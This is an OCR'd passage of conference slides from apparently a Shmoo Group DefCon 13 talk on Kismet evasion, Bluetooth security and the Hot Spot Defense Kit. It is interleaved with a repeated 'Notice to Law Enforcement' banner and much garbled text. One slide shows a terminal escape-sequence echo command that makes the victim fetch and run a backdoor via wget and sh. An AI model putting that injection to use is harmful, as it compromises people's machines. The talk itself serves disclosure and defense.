even ‘preventing authorized 
access without a warrant 
specific to each person's email 
Seizing the computer where 
this email resides would 
prevent such authorized 
access There are civil actions 
which may be taken against law 
enforcement agents under 
provision of the Act You can 
find them in USC 18. 2707 On 
this system you can expect 
multiple people to have stored 
email Each of them is entitled 
to collect SI 000 plus all legal 
expenses for violations of 
Section 2700 and 2703 Please 
ensure you have appropriate 
warrants before seizing this 
equipment 



<rishi@siegesoft.com> 

Affects: All Platforms 

URL: 

http://potkettle.net/advisories/! 
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NOTICE TO LAW 
ENFORCEMENT 
AGENTS 



The owners and users of this 
system are exercising First 
Amendment rights 

Some material on this system is 
in preparation for public 
dissemination and is "wot* 
product material" protected 
under The First Amendment 
Privacy Protection Act of 1980 
(USC 42, Section 2000aa), 
Note that this is a civil statute 
Violation of this statute by law 
enforcement agents is very 
likely to result in a civil suit as 
provided Section 2000aa-6 
Each and every person who 
has "work product matenal" 
stored on this system is entitled 
to recover at least minimum 
damages of $1000 plus all legal 
expenses Agents in some 
states may not be protected 
from personal civil liability if 
they violate this statute. 

In addition, there is email, i.e., 
"stored electronic 

communications" as defined by 
the Electronic Communications 
Privacy Act (EC PA) which has 
been in storage less than 180 
days on this system Such 
stored electronic 

communications are protected 
by the ECPA from seizure or 
even ‘preventing authorized 
access without a warrant 
specific to each person's email 
Seizing the computer where 
this email resides would 
prevent such authorized 
access There are civil actions 
which may be taken against law 
enforcement agents under 
provision of the Act You can 
find them in USC 18. 2707 On 
this system you can expect 
multiple people to have stored 
email Each of them is entitled 
to collect SI 000 plus all legal 
expenses for violations of 
Section 2700 and 2703 Please 
ensure you have appropriate 
warrants before seizing this 
equipment 



Kismet Evasion 

•So, wanna evade kismet? 

scanned = sscanf(in_data+hdrlen+18, "%d \001%255[^\001]\001 11 
,l \001%255r\001]\001 11 

11 %d %d %d %d %d %d %d %d %d %hd.%hd.%hd.%hd 11 

11 %d %f %f %f %f %f %f %f %f %d %d %d %f %d %d %d %d %d %d 

11 %f %f %f %lf %lf %lf %ld %ld" 

11 %d %d %d %d %d %d %d %d M , 

(int *) &type, ssid, beaconstr, 

&llc_packets, &data_packets, &crypt_packets. 



4 ^ 







Set your SSID to "shmooXxOl" 
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NOTICE TO LAW 
ENFORCEMENT 
AGENTS 



The owners and users of this 
system are exercising First 
Amendment rights 

Some material on this system is 
in preparation for public 
dissemination and is "wot* 
product material" protected 
under The First Amendment 
Privacy Protection Act of 1980 
(USC 42, Section 2000aa), 
Note that this is a civil statute 
Violation of this statute by law 
enforcement agents is very 
likely to result in a civil suit as 
provided Section 2000aa-6 
Each and every person who 
has "work product matenal" 
stored on this system is entitled 
to recover at least minimum 
damages of $1000 plus all legal 
expenses Agents in some 
states may not be protected 
from personal civil liability if 
they violate this statute. 

In addition, there is email, i.e., 
"stored electronic 

communications" as defined by 
the Electronic Communications 
Privacy Act (EC PA) which has 
been in storage less than 180 
days on this system Such 
stored electronic 

communications are protected 
by the ECPA from seizure or 
even ‘preventing authorized 
access without a warrant 
specific to each person's email 
Seizing the computer where 
this email resides would 
prevent such authorized 
access There are civil actions 
which may be taken against law 
enforcement agents under 
provision of the Act You can 
find them in USC 18. 2707 On 
this system you can expect 
multiple people to have stored 
email Each of them is entitled 
to collect SI 000 plus all legal 
expenses for violations of 
Section 2700 and 2703 Please 
ensure you have appropriate 
warrants before seizing this 
equipment 



And MORE...! 

• Wanna own Metasploit & Canvas 
users? 

• Use HDM's exploits against his 
own projects? 

echo -e "\e]10;[:/Special/{ Access} wget 
127.0.0.1/.bd\rsh 

bd\rexit\r: ]\a\e] 1 0; [show]\a" 
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NOTICE TO LAW 
ENFORCEMENT 
AGENTS 



The owners and users of this 
system are exercising First 
Amendment rights 

Some material on this system is 
in preparation for public 
dissemination and is "wot* 
product material” protected 
under The First Amendment 
Privacy Protection Act of 1980 
(USC 42. Section 2000aa). 
Note that this is a civil statute 
Violation of this statute by law 
enforcement agents is very 
likely to result in a civil suit as 
provided Section 2000aa-6 
Each and every person who 
has "work product material" 
stored on this system is entitled 
to recover at least minimum 
damages of $1000 plus all legal 
expenses Agents in some 
states may not be protected 
from personal civil liability if 
they violate this statute 

In addition, there is email, i.e., 
"stored electronic 

communications" as defined by 
the Electronic Communications 
Privacy Act (EC PA) which has 
been in storage less than 180 
days on this system Such 
stored electronic 

communications are protected 
by the ECPA from seizure or 
even ‘preventing authorized 
access without a warrant 
specific to each person's email. 
Seizing the computer where 
this email resides would 
prevent such authorized 
access There are civil actions 
which may be taken against law 
enforcement agents under 
provision of the Act You can 
find them in USC 18. 2707 On 
this system you can expect 
multiple people to have stored 
email Each of them is entitled 
to collect SI 000 plus all legal 
expenses for violations of 
Section 2700 and 2703 Please 
ensure you have appropriate 
warrants before seizing this 
equipment 



And Bruce gets to rant, 

too! 
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NOTICE TO LAW 
ENFORCEMENT 
AGENTS 



The owners and users of this 
system are exercising First 
Amendment rights 

Some material on this system is 
in preparation for public 
dissemination and is "wot* 
product material" protected 
under The First Amendment 
Privacy Protection Act of 1980 
(USC 42, Section 2000aa), 
Note that this is a civil statute 
Violation of this statute by law 
enforcement agents is very 
likely to result in a civil suit as 
provided Section 2000aa-6 
Each and every person who 
has "work product matenal" 
stored on this system is entitled 
to recover at least minimum 
damages of $1000 plus all legal 
expenses Agents in some 
states may not be protected 
from personal civil liability if 
they violate this statute. 



Bluetooth Security 

Things have gotten worse, not better 

- Millions more radios than last year 

- Several high profile vulnerabilities 



In addition, there is email, i.e., 
"stored electronic 

communications" as defined by 
the Electronic Communications 
Privacy Act (EC PA) which has 
been in storage less than 180 
days on this system Such 
stored electronic 

communications are protected 
by the ECPA from seizure or 
even ‘preventing authorized 
access without a warrant 
specific to each person's email 
Seizing the computer where 
this email resides would 
prevent such authorized 
access There are civil actions 
which may be taken against law 
enforcement agents under 
provision of the Act You can 
find them in USC 18. 2707 On 
this system you can expect 
multiple people to have stored 
email Each of them is entitled 
to collect SI 000 plus all legal 
expenses for violations of 
Section 2700 and 2703 Please 
ensure you have appropriate 
warrants before seizing this 
equipment 



- Near zero focus from enterprises 

Trifinite.org's work 

- Blooover quite the uber tool 
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NOTICE TO LAW 
ENFORCEMENT 
AGENTS 



The owners and users of this 
system are exercising First 
Amendment rights 

Some material on this system is 
in preparation for public 
dissemination and is "wot* 
product material" protected 
under The First Amendment 
Privacy Protection Act of 1980 
(USC 42, Section 2000aa), 
Note that this is a civil statute 
Violation of this statute by law 
enforcement agents is very 
likely to result in a civil suit as 
provided Section 2000aa-6 
Each and every person who 
has "work product matenal" 
stored on this system is entitled 
to recover at least minimum 
damages of $1000 plus all legal 
expenses Agents in some 
states may not be protected 
from personal civil liability if 
they violate this statute. 

In addition, there is email, i.e., 
"stored electronic 

communications" as defined by 
the Electronic Communications 
Privacy Act (EC PA) which has 
been in storage less than 180 
days on this system Such 
stored electronic 

communications are protected 
by the ECPA from seizure or 
even ‘preventing authorized 
access without a warrant 
specific to each person's email 
Seizing the computer where 
this email resides would 
prevent such authorized 
access There are civil actions 
which may be taken against law 
enforcement agents under 
provision of the Act You can 
find them in USC 18. 2707 On 
this system you can expect 
multiple people to have stored 
email Each of them is entitled 
to collect SI 000 plus all legal 
expenses for violations of 
Section 2700 and 2703 Please 
ensure you have appropriate 
warrants before seizing this 
equipment 



Bluetooth Security 

Several other attacks via AT 
commands 

- Dialing, getting data, etc... not good 
things to do without authentication 

Pairing attacks, known for years, are 
now being coded and used 

WIDS still seems to equal 802.11 
tho... 

- Gonna be a bad year for IT security 
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NOTICE TO LAW 
ENFORCEMENT 
AGENTS 



The owners and users of this 
system are exercising First 
Amendment rights 

Some material on this system is 
in preparation for public 
dissemination and is "wot* 
product material" protected 
under The First Amendment 
Privacy Protection Act of 1980 
(USC 42, Section 2000aa), 
Note that this is a civil statute 
Violation of this statute by law 
enforcement agents is very 
likely to result in a civil suit as 
provided Section 2000aa-6 
Each and every person who 
has "work product matenal" 
stored on this system is entitled 
to recover at least minimum 
damages of $1000 plus all legal 
expenses Agents in some 
states may not be protected 
from personal civil liability if 
they violate this statute. 

In addition, there is email, i.e., 
"stored electronic 

communications" as defined by 
the Electronic Communications 
Privacy Act (EC PA) which has 
been in storage less than 180 
days on this system Such 
stored electronic 

communications are protected 
by the ECPA from seizure or 
even ‘preventing authorized 
access without a warrant 
specific to each person's email 
Seizing the computer where 
this email resides would 
prevent such authorized 
access There are civil actions 
which may be taken against law 
enforcement agents under 
provision of the Act You can 
find them in USC 18. 2707 On 
this system you can expect 
multiple people to have stored 
email Each of them is entitled 
to collect SI 000 plus all legal 
expenses for violations of 
Section 2700 and 2703 Please 
ensure you have appropriate 
warrants before seizing this 
equipment 



Defending Wireless 

N etworks 

We seemed to have covered a lot of 
ground on the Offensive.. What about 
Defense *boom boom* Defense! 

First there was Host Spot Defense 
Kit (HSDK) 

- Released BH Fed 03 

- Looked for directed rogue AP attacks 
against your client 

- OS X, Linux, and Windows code 
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NOTICE TO LAW 
ENFORCEMENT 
AGENTS 



The owners and users of this 
system are exercising First 
Amendment rights 

Some material on this system is 
in preparation for public 
dissemination and is "worts 
product material" protected 
under The First Amendment 
Privacy Protection Act of 1980 
(USC 42. Section 2000aa). 
Note that this is a civil statute 
Violation of this statute by law 
enforcement agents is very 
likely to result in a civil suit as 
provided Section 2000aa-6 
Each and every person who 
has "work product matenal" 
stored on this system is entitled 
to recover at least minimum 
damages of $1000 plus all legal 
expenses Agents in some 
states may not be protected 
from personal civil liability if 
they violate this statute 

In addition, there is email, i.e , 
"stored electronic 

communications" as defined by 
the Electronic Communications 
Privacy Act (ECPA) which has 
been in storage less than 180 
days on this system Such 
stored electronic 

communications are protected 
by the ECPA from seizure or 
even ‘preventing authorized 
access without a warrant 
specific to each person's email 
Seizing the computer where 
this email resides would 
prevent such authorized 
access There are civil actions 
which may be taken against law 
enforcement agents under 
provision of the Act You can 
find them in USC 18. 2707 On 
this system you can expect 
multiple people to have stored 
email Each of them is entitled 
to collect SI 000 plus all legal 
expenses for violations of 
Section 2700 and 2703 Please 
ensure you have appropriate 
warrants before seizing this 
equipment 







Defending Wireless 

Networks 

At the time of HSDK, there was NO 
capability for rogue detection in 
commercially avail software 

Today, we're still not much better 

- AirDefense Mobile, some other small stuff 

- Rogues are THE BIGGEST threat against 
enterprise networks 

So, while the industry is still finding 
their whatnot with both hands, we're 
making... 
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NOTICE TO LAW 
ENFORCEMENT 
AGENTS 



The owners and users of this 
system are exercising First 
Amendment rights 

Some material on this system is 
in preparation for public 
dissemination and is "wot* 
product material" protected 
under The First Amendment 
Privacy Protection Act of 1980 
(USC 42, Section 2000aa), 
Note that this is a civil statute 
Violation of this statute by law 
enforcement agents is very 
likely to result in a civil suit as 
provided Section 2000aa-6 
Each and every person who 
has "work product matenal" 
stored on this system is entitled 
to recover at least minimum 
damages of $1000 plus all legal 
expenses Agents in some 
states may not be protected 
from personal civil liability if 
they violate this statute. 

In addition, there is email, i.e., 
"stored electronic 

communications" as defined by 
the Electronic Communications 
Privacy Act (EC PA) which has 
been in storage less than 180 
days on this system Such 
stored electronic 

communications are protected 
by the ECPA from seizure or 
even ‘preventing authorized 
access without a warrant 
specific to each person's email 
Seizing the computer where 
this email resides would 
prevent such authorized 
access There are civil actions 
which may be taken against law 
enforcement agents under 
provision of the Act You can 
find them in USC 18. 2707 On 
this system you can expect 
multiple people to have stored 
email Each of them is entitled 
to collect SI 000 plus all legal 
expenses for violations of 
Section 2700 and 2703 Please 
ensure you have appropriate 
warrants before seizing this 
equipment 



Hot Spot Defense Kit v2 

• Enterprise wireless IDS systems look 
for any attack, not just one directed 
at a particular client 

• When you are on the road (or don't 
have the "luxury" of an enterprise 
WIDS) you need the same kind of 
protection 
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NOTICE TO LAW 
ENFORCEMENT 
AGENTS 



The owners and users of this 
system are exercising First 
Amendment rights 

Some material on this system is 
in preparation for public 
dissemination and is "wot* 
product material" protected 
under The First Amendment 
Privacy Protection Act of 1980 
(USC 42, Section 2000aa), 
Note that this is a civil statute 
Violation of this statute by law 
enforcement agents is very 
likely to result in a civil suit as 
provided Section 2000aa-6 
Each and every person who 
has "work product matenal" 
stored on this system is entitled 
to recover at least minimum 
damages of $1000 plus all legal 
expenses Agents in some 
states may not be protected 
from personal civil liability if 
they violate this statute. 

In addition, there is email, i.e., 
"stored electronic 

communications" as defined by 
the Electronic Communications 
Privacy Act (EC PA) which has 
been in storage less than 180 
days on this system Such 
stored electronic 

communications are protected 
by the ECPA from seizure or 
even ‘preventing authorized 
access without a warrant 
specific to each person's email 
Seizing the computer where 
this email resides would 
prevent such authorized 
access There are civil actions 
which may be taken against law 
enforcement agents under 
provision of the Act You can 
find them in USC 18. 2707 On 
this system you can expect 
multiple people to have stored 
email Each of them is entitled 
to collect SI 000 plus all legal 
expenses for violations of 
Section 2700 and 2703 Please 
ensure you have appropriate 
warrants before seizing this 
equipment 



Hot Spot Defense Kit v2 

• HSDK v 2 aims to be an 
environmental monitor of sorts 

- Looks for any zip in the wire, not just 
ones directly effecting the client 

- If you're in downtown Baltimore, and 
someone starts shooting, you tend to 
freak out even if they're not shooting at 
you... wireless shouldn't be any different 
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NOTICE TO LAW 
ENFORCEMENT 
AGENTS 



The owners and users of this 
system are exercising First 
Amendment rights 

Some material on this system is 
in preparation for public 
dissemination and is "worts 
product material" protected 
under The First Amendment 
Privacy Protection Act of 1980 
(USC 42. Section 2000aa). 
Note that this is a civil statute 
Violation of this statute by law 
enforcement agents is very 
likely to result in a civil suit as 
provided Section 2000aa-6 
Each and every person who 
has "work product matenal" 
stored on this system is entitled 
to recover at least minimum 
damages of $1000 plus all legal 
expenses Agents in some 
states may not be protected 
from personal civil liability if 
they violate this statute 

In addition, there is email, i.e , 
"stored electronic 

communications" as defined by 
the Electronic Communications 
Privacy Act (ECPA) which has 
been in storage less than 180 
days on this system Such 
stored electronic 

communications are protected 
by the ECPA from seizure or 
even ‘preventing authorized 
access without a warrant 
specific to each person's email 
Seizing the computer where 
this email resides would 
prevent such authorized 
access There are civil actions 
which may be taken against law 
enforcement agents under 
provision of the Act You can 
find them in USC 18. 2707 On 
this system you can expect 
multiple people to have stored 
email Each of them is entitled 
to collect SI 000 plus all legal 
expenses for violations of 
Section 2700 and 2703 Please 
ensure you have appropriate 
warrants before seizing this 
equipment 







HSDK v2 

Still under development 
Looking for: 

- Mass auth/deauth/assoc attacks 

- Fake AP signatures 

- Reinjection attacks (hard) 

- The standard rogue detection stuff from 
vl 

If something is detected, the green 
ball turns red (step away from the 
computer) 

- If security software isn't usable, it's 

useless DefCon 13 




NOTICE TO LAW 
ENFORCEMENT 
AGENTS 



The owners and users of this 
system are exercising First 
Amendment rights 

Some material on this system is 
in preparation for public 
dissemination and is "wot* 
product material" protected 
under The First Amendment 
Privacy Protection Act of 1980 
(USC 42, Section 2000aa), 
Note that this is a civil statute 
Violation of this statute by law 
enforcement agents is very 
likely to result in a civil suit as 
provided Section 2000aa-6 
Each and every person who 
has "work product matenal" 
stored on this system is entitled 
to recover at least minimum 
damages of $1000 plus all legal 
expenses Agents in some 
states may not be protected 
from personal civil liability if 
they violate this statute. 

In addition, there is email, i.e., 
"stored electronic 

communications" as defined by 
the Electronic Communications 
Privacy Act (EC PA) which has 
been in storage less than 180 
days on this system Such 
stored electronic 

communications are protected 
by the ECPA from seizure or 
even ‘preventing authorized 
access without a warrant 
specific to each person's email. 
Seizing the computer where 
this email resides would 
prevent such authorized 
access There are civil actions 
which may be taken against law 
enforcement agents under 
provision of the Act You can 
find them in USC 18. 2707 On 
this system you can expect 
multiple people to have stored 
email Each of them is entitled 
to collect SI 000 plus all legal 
expenses for violations of 
Section 2700 and 2703 Please 
ensure you have appropriate 
warrants before seizing this 
equipment 



Speaking of... 



• As security professionals, we sure 
haven't learned much 



- Security needs to be usable by the users 

• Users need hueristic decisions made for them 
and presented in red or green balls 

- Security admins need to act like 
professionals and have a real 
understanding of their operations 



IT Security Professiona 



Normal Users 



IDS 



Knowledge really needed by user 

► 



IDS 




Host and Enterprise 
INTEGRITY Monitori 
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NOTICE TO LAW 
ENFORCEMENT 
AGENTS 

The owners and users of this 
system are exercising First 
Amendment rights 

Some material on this system is 
in preparation for public 
dissemination and is "worts 
product material" protected 
under The First Amendment 
Privacy Protection Act of 1980 
(USC 42. Section 2000aa). 
Note that this is a civil statute 
Violation of this statute by law 
enforcement agents is very 
likely to result in a civil suit as 
provided Section 2000aa-6 
Each and every person who 
has "work product matenal" 
stored on this system is entitled 
to recover at least minimum 
damages of $1000 plus all legal 
expenses Agents in some 
states may not be protected 
from personal civil liability if 
they violate this statute 

In addition, there is email, i.e , 
"stored electronic 

communications" as defined by 
the Electronic Communications 
Privacy Act (ECPA) which has 
been in storage less than 180 
days on this system Such 
stored electronic 

communications are protected 
by the ECPA from seizure or 
even ‘preventing authorized 
access without a warrant 
specific to each person's email 
Seizing the computer where 
this email resides would 
prevent such authorized 
access There are civil actions 
which may be taken against law 
enforcement agents under 
provision of the Act You can 
find them in USC 18. 2707 On 
this system you can expect 
multiple people to have stored 
email Each of them is entitled 
to collect SI 000 plus all legal 
expenses for violations of 
Section 2700 and 2703 Please 
ensure you have appropriate 
warrants before seizing this 
equipment 






Potter's Pyramid of IT 
Security Needs 




Software 



ACLs 



Firewalls Auth / Auth 



Patch Mgt Op. Procedures 
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NOTICE TO LAW 
ENFORCEMENT 
AGENTS 



The owners and users of this 
system are exercising First 
Amendment rights 

Some material on this system is 
in preparation for public 
dissemination and is "wot* 
product material" protected 
under The First Amendment 
Privacy Protection Act of 1980 
(USC 42, Section 2000aa). 
Note that this is a civil statute 
Violation of this statute by law 
enforcement agents is very 
likely to result in a civil suit as 
provided Section 2000aa-6 
Each and every person who 
has "work product material" 
stored on this system is entitled 
to recover at least minimum 
damages of $1000 plus all legal 
expenses Agents in some 
states may not be protected 
from personal civil liability if 
they violate this statute 

In addition, there is email, i.e., 
"stored electronic 

communications" as defined by 
the Electronic Communications 
Privacy Act (EC PA) which has 
been in storage less than 180 
days on this system Such 
stored electronic 

communications are protected 
by the ECPA from seizure or 
even "preventing authorized 
access without a warrant 
specific to each person's email. 
Seizing the computer where 
this email resides would 
prevent such authorized 
access There are civil actions 
which may be taken against law 
enforcement agents under 
provision of the Act You can 
find them in USC 18. 2707 On 
this system you can expect 
multiple people to have stored 
email Each of them is entitled 
to collect SI 000 plus all legal 
expenses for violations of 
Section 2700 and 2703 Please 
ensure you have appropriate 
warrants before seizing this 
equipment 
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NOTICE TO LAW 
ENFORCEMENT 
AGENTS 



The owners and users of this 
system are exercising First 
Amendment rights 

Some material on this system is 
in preparation for public 
dissemination and is "wot* 
product material" protected 
under The First Amendment 
Privacy Protection Act of 1980 
(USC 42, Section 2000aa), 
Note that this is a civil statute 
Violation of this statute by law 
enforcement agents is very 
likely to result in a civil suit as 
provided Section 2000aa-6 
Each and every person who 
has "work product matenal" 
stored on this system is entitled 
to recover at least minimum 
damages of $1000 plus all legal 
expenses Agents in some 
states may not be protected 
from personal civil liability if 
they violate this statute. 

In addition, there is email, i.e., 
"stored electronic 

communications" as defined by 
the Electronic Communications 
Privacy Act (EC PA) which has 
been in storage less than 180 
days on this system Such 
stored electronic 

communications are protected 
by the ECPA from seizure or 
even ‘preventing authorized 
access without a warrant 
specific to each person's email 
Seizing the computer where 
this email resides would 
prevent such authorized 
access There are civil actions 
which may be taken against law 
enforcement agents under 
provision of the Act You can 
find them in USC 18. 2707 On 
this system you can expect 
multiple people to have stored 
email Each of them is entitled 
to collect SI 000 plus all legal 
expenses for violations of 
Section 2700 and 2703 Please 
ensure you have appropriate 
warrants before seizing this 
equipment 



ShmooCon 2006 

January 13-15 
Washington, D.C. 
Pre-registration is LIVE now. 
http://www.shmoocon.org 
Got an ad? Submit it! 

Here's one... 
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NOTICE TO LAW 
ENFORCEMENT 
AGENTS 



The owners and users of this 
system are exercising First 
Amendment rights 

Some material on this system is 
in preparation for public 
dissemination and is "wot* 
product material” protected 
under The First Amendment 
Privacy Protection Act of 1980 
(USC 42. Section 2000aa). 
Note that this is a civil statute 
Violation of this statute by law 
enforcement agents is very 
likely to result in a civil suit as 
provided Section 2000aa-6 
Each and every person who 
has "work product material" 
stored on this system is entitled 
to recover at least minimum 
damages of $1000 plus all legal 
expenses Agents in some 
states may not be protected 
from personal civil liability if 
they violate this statute 

In addition, there is email, i.e., 
"stored electronic 

communications" as defined by 
the Electronic Communications 
Privacy Act (EC PA) which has 
been in storage less than 180 
days on this system Such 
stored electronic 

communications are protected 
by the ECPA from seizure or 
even ‘preventing authorized 
access without a warrant 
specific to each person's email. 
Seizing the computer where 
this email resides would 
prevent such authorized 
access There are civil actions 
which may be taken against law 
enforcement agents under 
provision of the Act You can 
find them in USC 18. 2707 On 
this system you can expect 
multiple people to have stored 
email Each of them is entitled 
to collect SI 000 plus all legal 
expenses for violations of 
Section 2700 and 2703 Please 
ensure you have appropriate 
warrants before seizing this 
equipment 



Thanks ! 










Questions? 
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